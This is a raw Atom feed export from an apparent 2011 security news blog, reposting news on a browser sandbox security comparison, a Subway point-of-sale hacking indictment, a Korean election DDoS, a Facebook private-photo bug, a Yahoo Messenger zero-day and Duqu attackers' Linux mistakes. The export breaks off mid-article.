grass on a playground, security sandboxes isolate application code 
inside a perimeter that's confined from sensitive OS functions. By 
placing severe restrictions on an application's ability to read and 
write to the hard drive and interact with other peripheral resources, 
sandboxes are designed to lessen the damage attackers can do when they 
successfully exploit a vulnerability in the underlying code base.&lt;br /&gt;
&lt;br /&gt;
The so-called token in the Chrome sandbox, for instance, doesn't 
allow browser processes to access files outside of an extremely limited 
set of directories. It also forbids them from creating connections known
 as network sockets to communicate directly with servers over the 
internet. The sandbox in IE, by contrast, allows browser resources to 
read almost all parts of a hard drive and puts few restrictions on the 
creation of network sockets, the researchers said.&lt;br /&gt;
&lt;br /&gt;
As a result, attackers who exploit a vulnerability in the Microsoft 
browser will have an easier time accessing contacts, documents, and 
other data stored on the hard drive of a targeted computer and uploading
 it to a command and control server.&lt;br /&gt;
&lt;br /&gt;
"The Google Chrome token is far more restrictive," said Accuvant 
Chief Research Scientist Ryan Smith, who compared tokens to a driver's 
license that spells out what vehicles a holder is permitted to drive and
 other conditions, such as whether eyeglasses are required. "It's more 
like a learner's permit, whereas the Internet Explorer token is more 
like a Class C regular driver's license."&lt;br /&gt;
&lt;br /&gt;
The researchers analyzed each browser's ability to read files, write 
files, and perform 13 other actions. As indicated in the graphic below, 
Chrome blocked all but two of them. Of those, one known as "system 
parameters" was partially blocked. IE, meanwhile, completely blocked 
only two actions, and partially blocked seven more actions. Seven 
additional actions, including the ability to read files, access 
networks, and create processes, were completely unrestricted.&lt;br /&gt;
&lt;br /&gt;
In last place was Firefox, which allowed nine actions and partially blocked the remaining six actions.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-bFNXkhOIJnk/TuQKyXOBiVI/AAAAAAAAABg/x7Zre1rsS14/s1600/sandbox_comparison_small.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="293" src="http://3.bp.blogspot.com/-bFNXkhOIJnk/TuQKyXOBiVI/AAAAAAAAABg/x7Zre1rsS14/s320/sandbox_comparison_small.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="CaptionedImage Center Float"&gt;
&lt;h3&gt;
&lt;b&gt;&lt;span style="font-size: xx-small;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; (click on the picture to see it in real size)&lt;/span&gt;&lt;/b&gt; &lt;/h3&gt;
&lt;h3&gt;
Sin of omission&lt;/h3&gt;
The report refers to sandboxing as a "standard best practice within 
many popular applications." Chrome implements sandboxes in versions that
 run on &lt;a href="http://dev.chromium.org/developers/design-documents/sandbox" target="_blank"&gt;Windows&lt;/a&gt;, &lt;a href="http://www.chromium.org/developers/design-documents/sandbox/osx-sandboxing-design" target="_blank"&gt;Mac OS X&lt;/a&gt;, and &lt;a href="http://code.google.com/p/chromium/wiki/LinuxSandboxing" target="_blank"&gt;Linux&lt;/a&gt;.
 Microsoft deployed sandboxing more than five years ago, starting when 
users ran IE version 7 on Windows Vista or later versions of Windows. 
Even Apple, which commands a tiny fraction of the browser market, implemented a robust sandbox in versions of Safari that run on Lion, the latest release of OS X.&lt;br /&gt;
In this context, the continuing failure of Firefox to offer sandboxing features is hard to excuse.&lt;br /&gt;
In a statement issued prior to the release of Accuvant's report, 
Johnathan Nightingale, Mozilla's director of Firefox engineering, said:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;"Firefox includes a broad array of technologies to eliminate or 
reduce security threats, from platform level features like address space
 randomization to internal systems like our layout frame poisoning 
system. Sandboxing is a useful addition to that toolbox that we are 
investigating, but no technology is a silver bullet. We invest in 
security throughout the development process with internal and external 
code reviews, constant testing and analysis of running code, and rapid 
response to security issues when they emerge. We're proud of our 
reputation on security, and it remains a central priority for Firefox.&lt;/b&gt;&lt;br /&gt;
&lt;h3&gt;
Reining in add-ons&lt;/h3&gt;
The researchers also gave Chrome high marks for the strict 
limitations it places on software add-ons that extend the things users 
can do with the browser. As a result, attackers who manage to exploit 
extension bugs or trick victims into installing malicious add-ons are 
severely limited in the damage they can do. By comparison, IE and 
Firefox give extensions much wider latitude. IE add-ons, for instance, 
have the ability to create processes and to access the Windows 
clipboard, which can be a means of funneling malicious data from one 
application to another.&lt;br /&gt;
&lt;br /&gt;
The other area where Chrome outflanked its rivals was its offering of
 what's known as JIT hardening. Short for just in time, JIT refers to 
code that's compiled on the fly and executed inside the browser. 
Attackers have long relied on JIT techniques to convert JavaScript into 
malicious machine code that bypasses exploit mitigations such as ASLR.&lt;br /&gt;
&lt;br /&gt;
JIT hardening in Chrome, and to a lesser extent in IE, counteracts JIT
 attacks by compiling JavaScript in an unpredictable way that makes it 
hard for attackers to control. Mozilla developers have yet to implement 
the feature in Firefox.&lt;br /&gt;
&lt;div class="CaptionedImage Center Float"&gt;
&lt;/div&gt;
&lt;div class="CaptionedImage Center Float"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-OcGye96y018/TuQM_ZVGrXI/AAAAAAAAABw/Ha_wFLzgV9s/s1600/browser_comparison_big.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="155" src="http://3.bp.blogspot.com/-OcGye96y018/TuQM_ZVGrXI/AAAAAAAAABw/Ha_wFLzgV9s/s320/browser_comparison_big.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="CaptionedImage Center Float"&gt;
&lt;b&gt;&lt;span style="font-size: xx-small;"&gt;(click on the picture to see it in real size)&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
Besides ranking the security of the top three browsers, the paper 
argues that many of the metrics regularly used to gauge how well 
software stands up to hack attacks are unreliable. One such metric is 
the number of vulnerabilities patched, based on the assumption that a 
program with more patched bugs has poorer-quality code than one with fewer. Other 
frequently cited factors include how quickly bugs are fixed and the 
severity of the bugs.&lt;br /&gt;
&lt;br /&gt;
In the end, a browser will either succumb to a given exploit or it won't, and that's all that mattered to the paper's authors.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;"We really didn't believe those [metrics] had much merit because it's
 really hard to correlate those things, especially between browsers and 
vendors,"&lt;/b&gt; said Valasek, who along with Smith, was assisted by Accuvant 
colleagues Joshua Drake, Paul Mehta, Charlie Miller, and Shawn Moyer.&lt;b&gt; 
"So we decided: Let's focus this paper on exploitation mitigation 
technology to show how these actually stand up against attackers when 
they find a vulnerability." &lt;/b&gt;


&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-6229407681719528988?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/XIGVs10eyWc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/6229407681719528988/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/new-study-chrome-is-number-one.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/6229407681719528988?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/6229407681719528988?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/XIGVs10eyWc/new-study-chrome-is-number-one.html" title="New study - Chrome is number One !" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-dzLauS6aPLw/TuQLxySF2pI/AAAAAAAAABo/z60y3Ic3gw8/s72-c/chrome-205_noshadow.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/new-study-chrome-is-number-one.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUQNSH48fyp7ImA9WhRQFUs.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-1095475802988094216</id><published>2011-12-11T01:30:00.001Z</published><updated>2011-12-11T01:36:39.077Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-11T01:36:39.077Z</app:edited><title>hacking 150 Subway shops by Four Romanians</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Four Romanian hackers were charged with stealing millions of 
dollars by hacking into the credit card processing systems of more than 
200 businesses.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-qpl48QjAWuo/TuQIloYQl_I/AAAAAAAAABY/GkFT3gEuNd0/s1600/719-subwayweb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="243" src="http://4.bp.blogspot.com/-qpl48QjAWuo/TuQIloYQl_I/AAAAAAAAABY/GkFT3gEuNd0/s320/719-subwayweb.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;


The men remotely accessed point-of-sale systems of 150 Subway 
sandwich shops and 50 unnamed retailers and stole credit card data 
for more than 80,000 customers, according to a federal indictment 
unsealed earlier this week. They used the stolen account information to 
make unauthorized purchases worth millions of dollars, prosecutors said.&lt;br /&gt;
&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
The men allegedly scanned the internet to identify POS terminals that
 used certain remote desktop software applications and then gained 
unauthorized access to them by guessing or brute forcing passwords.&lt;br /&gt;
&lt;br /&gt;

&lt;/div&gt;
The indictment, filed in US District Court in New Hampshire, named 
Adrian-Tiberiu Oprea, 27, Iulian Dolan, 27, Cezar Iulian Butu, 26, and 
Florin Radu, 23. They were each charged with four counts, including 
conspiracy to commit computer fraud, wire fraud, and two counts of 
conspiracy to commit fraud in connection with access devices.&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/1095475802988094216/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/hacking-150-subway-shops-by-four.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/1095475802988094216?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/1095475802988094216?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/BCFW79rLEGg/hacking-150-subway-shops-by-four.html" title="hacking 150 Subway shops by Four Romanians" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-qpl48QjAWuo/TuQIloYQl_I/AAAAAAAAABY/GkFT3gEuNd0/s72-c/719-subwayweb.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/hacking-150-subway-shops-by-four.html</feedburner:origLink></entry><entry 
gd:etag="W/&quot;DEcEQno5fSp7ImA9WhRQEkU.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-8481973066454725658</id><published>2011-12-07T19:19:00.001Z</published><updated>2011-12-07T19:26:43.425Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-07T19:26:43.425Z</app:edited><title>DDoS attack heats Korean election !</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
A political scandal is unfolding in the Republic of Korea over alleged denial of service attacks against the National Election Commission (NEC) website.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-bQeialujMD4/Tt-9IfvoO_I/AAAAAAAAABQ/uZKe5HSF1Q8/s1600/174843_133718316696673_6756749_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-bQeialujMD4/Tt-9IfvoO_I/AAAAAAAAABQ/uZKe5HSF1Q8/s320/174843_133718316696673_6756749_n.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;


Police have arrested the 27-year-old personal assistant of ruling 
Grand National Party politician Choi Gu-sik over the alleged 
cyber-assault, which disrupted a Seoul mayoral by-election back in 
October.&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
However, security experts said that they doubt the suspect, 
identified only by his surname "Gong", had the technical expertise or 
resources needed to pull off the sophisticated attack. Rather than 
knocking the NEC website offline, the attack made a portion of the 
website – offering information on voting booth locations – inaccessible.&lt;br /&gt;
&lt;br /&gt;

&lt;/div&gt;
Despite this issue resembling a technical fault rather than a DDoS 
attack, the incident is being treated as a criminal attack by the 
police, who have arrested Gong and charged him along with three others.&lt;br /&gt;


Police said that the "attack", which lasted for more than two hours, 
was launched using a total of 10 wireless internet connections, 
including five T-Login and five WiBro connections. Police speculated 
that this was either a way of making it harder to thwart the attack or 
an attempt to complicate police efforts to investigate the assault. A 
police official told Korean daily newspaper &lt;i&gt;&lt;a href="http://english.hani.co.kr/arti/english_edition/e_national/508531.html"&gt;The HankYoreh&lt;/a&gt;&lt;/i&gt;: “This went beyond simply using zombie PCs and wireless internet to launder IP addresses. It was a sophisticated attack.”&lt;br /&gt;
&lt;br /&gt;


Opposition groups argue that the early morning timing of the attack 
was carefully designed to disrupt the voting of young commuters, who are
 more likely to vote for opposition (liberal) candidates. They want to 
force a parliamentary audit or special prosecutor’s investigation if the
 police investigation fails to get to the bottom of the attack.&lt;br /&gt;
&lt;br /&gt;


Gong continues to protest his innocence, a factor that has led 
opposition politicians to speculate that he is covering up for 
higher-ranking officials who ordered the attack.&lt;br /&gt;


Democratic Party politician Baek Won-woo told &lt;a href="http://english.hani.co.kr/arti/english_edition/e_national/508531.html" target="_blank"&gt;&lt;em&gt;The HankYoreh&lt;/em&gt;&lt;/a&gt;:
 “We need to determine quickly and precisely whether there was someone 
up the line who ordered the attack, and whether there was compensation.”
 &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-8481973066454725658?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/BCLS--vURQw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/8481973066454725658/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/ddos-attack-heats-korean-election.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/8481973066454725658?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/8481973066454725658?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/BCLS--vURQw/ddos-attack-heats-korean-election.html" title="DDoS attack heats Korean election !" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-bQeialujMD4/Tt-9IfvoO_I/AAAAAAAAABQ/uZKe5HSF1Q8/s72-c/174843_133718316696673_6756749_n.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/ddos-attack-heats-korean-election.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0QBRXY8eCp7ImA9WhRQEkU.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-1947513363312819991</id><published>2011-12-07T19:05:00.001Z</published><updated>2011-12-07T19:15:54.870Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-07T19:15:54.870Z</app:edited><title>Hackers :Facebook security hole exposes Mark Zuckerberg's privates !!!</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
A security flaw in the Facebook social network has been exposing private pictures of 
countless users, including Facebook's founder and CEO Mark 
Zuckerberg.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-m1tpD8Doo5Y/Tt-57iHaY6I/AAAAAAAAABI/RlAlmOQiOWA/s1600/Facebook.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-m1tpD8Doo5Y/Tt-57iHaY6I/AAAAAAAAABI/RlAlmOQiOWA/s320/Facebook.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
A &lt;a href="http://forum.bodybuilding.com/showthread.php?t=140261733" target="_blank"&gt;photo pilfering exploit&lt;/a&gt;
 posted to the &lt;b&gt;bodybuilding.com forum&lt;/b&gt; on Monday included step-by-step 
instructions for viewing pictures designated as private by the Facebook 
users who posted them. It worked by manipulating a feature that allows 
people to report inappropriate profile pictures to Facebook officials. 
The routine allowed snitches to report additional pictures, even when 
designations made the images off-limits to all but a select set of 
friends.&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
Not all the participants in the forum reported success. It would 
appear that those located in the US got better results than others. 
Several hours after the vulnerability was reported, &lt;a href="https://imgur.com/a/PrLrB" target="_blank"&gt;13 images purportedly lifted from Zuckerberg's account&lt;/a&gt; were posted below a headline that read: “It's time to fix those security flaws Facebook...”&lt;br /&gt;

&lt;/div&gt;
They show Zuck wining and dining with friends, chatting with 
President Barack Obama, and holding what appears to be a freshly 
slaughtered chicken, in keeping with a recent predilection to eat only meat he has killed himself.&lt;br /&gt;


In a statement, Facebook officials said:&lt;br /&gt;


&lt;blockquote&gt;
&lt;b&gt;Earlier today, we discovered a bug in one of our reporting 
flows that allows people to report multiple instances of inappropriate 
content simultaneously. The bug allowed anyone to view a limited number 
of another user's most recently uploaded photos irrespective of the 
privacy settings for these photos. This was the result of one of our 
recent code pushes and was live for a limited period of time. Upon 
discovering the bug, we immediately disabled the system, and will only 
return functionality once we can confirm the bug has been fixed.
&lt;/b&gt;&lt;b&gt;The privacy of our users' data is a top priority for us, and we 
invest significant resources in protecting our site and the people who 
use it. We hire the most qualified and highly-skilled engineers and 
security professionals at Facebook, and with the recent launch of our 
Security Bug Bounty Program (http://www.facebook.com/whitehat/ ), we 
continue to work with the industry to identify and resolve legitimate 
threats to help us keep the site safe and secure for everyone.&lt;/b&gt;&lt;br /&gt;

&lt;/blockquote&gt;
It's not the first time someone has figured out how to bypass 
Facebook permissions designed to give users tight control over who gets 
to see images and announcements posted to their pages. In 2008, a 
Canadian computer technician was able to view private photos of Paris 
Hilton, Zuckerberg, and others by guessing the ID of the photo. Last year, the social network was caught exposing the name and photo of all 500 million of its users when their email addresses were typed in to the log-in page.&lt;br /&gt;
&lt;br /&gt;
Monday's discovery of yet another hole in Facebook's safety net is 
the latest reminder that the only way to be sure something doesn't get 
published to world+dog is to keep it off the internet in the first 
place. Permission systems such as those on Facebook and other sites may 
make users feel better, but they have little effect on hackers with 
enough determination or time on their hands.&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/1947513363312819991/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/hackers-facebook-security-hole-exposes.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/1947513363312819991?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/1947513363312819991?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/G_XYcqbfszs/hackers-facebook-security-hole-exposes.html" title="Hackers :Facebook security hole exposes Mark Zuckerberg's privates !!!" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-m1tpD8Doo5Y/Tt-57iHaY6I/AAAAAAAAABI/RlAlmOQiOWA/s72-c/Facebook.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/hackers-facebook-security-hole-exposes.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUcGRXkyeyp7ImA9WhRRGUk.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-569346385945933520</id><published>2011-12-03T21:08:00.001Z</published><updated>2011-12-03T21:17:04.793Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-03T21:17:04.793Z</app:edited><title>Yahoo! Zero-day(0day)!  status! updates! exploit! hijacks!</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
A new unpatched flaw in Yahoo!'s Messenger client is causing trouble for the client and its users!&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-g3fn1DEsQdg/TtqRvmd0GKI/AAAAAAAAABA/-LgbG7hAYl0/s1600/01459960-photo-logo-yahoo-bang.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="196" src="http://2.bp.blogspot.com/-g3fn1DEsQdg/TtqRvmd0GKI/AAAAAAAAABA/-LgbG7hAYl0/s320/01459960-photo-logo-yahoo-bang.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Security researchers have discovered an unpatched flaw in Yahoo! 
Messenger that allows miscreants to change any user's status message.&lt;br /&gt;
&lt;br /&gt;
Hijacked status updates are a handy way to persuade a victim's 
contacts to click on a link and lead them to a dangerous website. Worse 
still, the bug in version 11.x of the Messenger client requires minimal 
user interaction to work, unlike previous exploits that relied on conning
 prospective marks.&lt;br /&gt;
&lt;br /&gt;
&lt;div id="article-mpu-container"&gt;
&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;
&lt;/div&gt;
The attacker sends a supposed file to a target that is actually an 
iframe that swaps the status message for the attacker's customised text,
 as explained in a blog post by net security firm BitDefender &lt;a href="http://www.malwarecity.com/blog/new-yahoo-messenger-0-day-exploit-hijacks-users-status-update-1229.html" target="_blank"&gt;here&lt;/a&gt;. The message might be, and in most attack scenarios would be, sent from outside a targeted user's contact list.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
If successfully executed, a victim will have no indication that his 
or her status message has been rewritten. The ruse might be used to gain
 affiliate incomes by promoting dodgy sites as well as directing users 
towards sites loaded with exploits or scareware scams.&lt;br /&gt;
&lt;br /&gt;
Bitdefender said it has notified Yahoo about the vulnerability. 
Attacks based on the as yet unfixed flaw have already been detected in 
the wild, the Romanian security firm warns.&lt;br /&gt;
&lt;br /&gt;
It advises users to change the setting of their IM client to "ignore 
anyone who is not in your Yahoo! Contacts" (which is off by default) as a
 precaution pending the release of a patch. In addition, some security 
suites include a web filter function that ought to defend users from 
this attack.&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/569346385945933520/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/yahoo-zero-day0day-status-updates.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/569346385945933520?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/569346385945933520?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/TdG6vSEgPfs/yahoo-zero-day0day-status-updates.html" title="Yahoo! Zero-day(0day)!  status! updates! exploit! hijacks!" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-g3fn1DEsQdg/TtqRvmd0GKI/AAAAAAAAABA/-LgbG7hAYl0/s72-c/01459960-photo-logo-yahoo-bang.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/yahoo-zero-day0day-status-updates.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEFQ3Y_eip7ImA9WhRRGEk.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-5973375854988960469</id><published>2011-12-02T15:50:00.001Z</published><updated>2011-12-02T16:16:52.842Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-02T16:16:52.842Z</app:edited><title>Duqu attackers:  Linux rookies, master coders, Amateurs Mistakes</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
The malware attack that has targeted many companies, including Iran's nuclear program, has prompted plenty of speculation. So what is this malware attack?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-u7U4kQCIXbU/Ttj5zOl95UI/AAAAAAAAAA4/FQQy5iC6HsI/s1600/12055-trojan_article.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="212" src="http://3.bp.blogspot.com/-u7U4kQCIXbU/Ttj5zOl95UI/AAAAAAAAAA4/FQQy5iC6HsI/s320/12055-trojan_article.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
The &lt;b&gt;Duqu&lt;/b&gt;* malware that targeted industrial manufacturers around the world may have been spawned by a well-funded team of competent coders, but their shaky command of Linux led to some highly amateur mistakes.&lt;br /&gt;
&lt;br /&gt;


According to a report published on Wednesday
 by researchers from Kaspersky Lab, the unknown attackers attempted a 
global cleanup on a dozen or more hacked Linux servers they used to 
control systems infected with Duqu. The mass purge on machines running 
CentOS 5.x came on October 20, two days after researchers publicly compared Duqu to the Stuxnet worm that sabotaged Iran's nuclear program. Speculation is the operators were trying to cover their tracks.&lt;br /&gt;
&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; In their haste, the attackers appear to have made some critical 
mistakes. Servers in Vietnam and Germany contained partial logs of the 
hackers' SSH and bash sessions that remained on the / partition.&lt;br /&gt;

&lt;/div&gt;
“This was kind of unexpected and it is an excellent lesson about 
Linux and the ext3 file system internals,” Kaspersky researcher Vitaly 
Kamluk wrote. “Deleting a file doesn't mean there are no traces or 
parts, sometimes from the past. The reason for this is that Linux 
constantly reallocates commonly used files to reduce fragmentation.”&lt;br /&gt;
&lt;br /&gt;


&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; The sshd.log files show the attackers logging into the Vietnam-based 
machine in July and in October just prior to the mass purge. The 
Germany-based system also showed evidence of being accessed on November 
23, 2009 and the user receiving error messages indicating that attempts 
to redirect traffic on ports 80 and 443 had failed. The breadcrumbs may 
have been few, but they were enough to show that the servers weren't 
true command and control channels, but rather proxies designed to 
conceal the attackers' true origin.&lt;br /&gt;


Using similar techniques, the Kaspersky researchers unearthed 
evidence that every hacked server had its OpenSSH 4.3 application 
upgraded to version 5.8. A recovered bash history on the machine in 
Germany also showed the attackers needed refreshers in basic Linux 
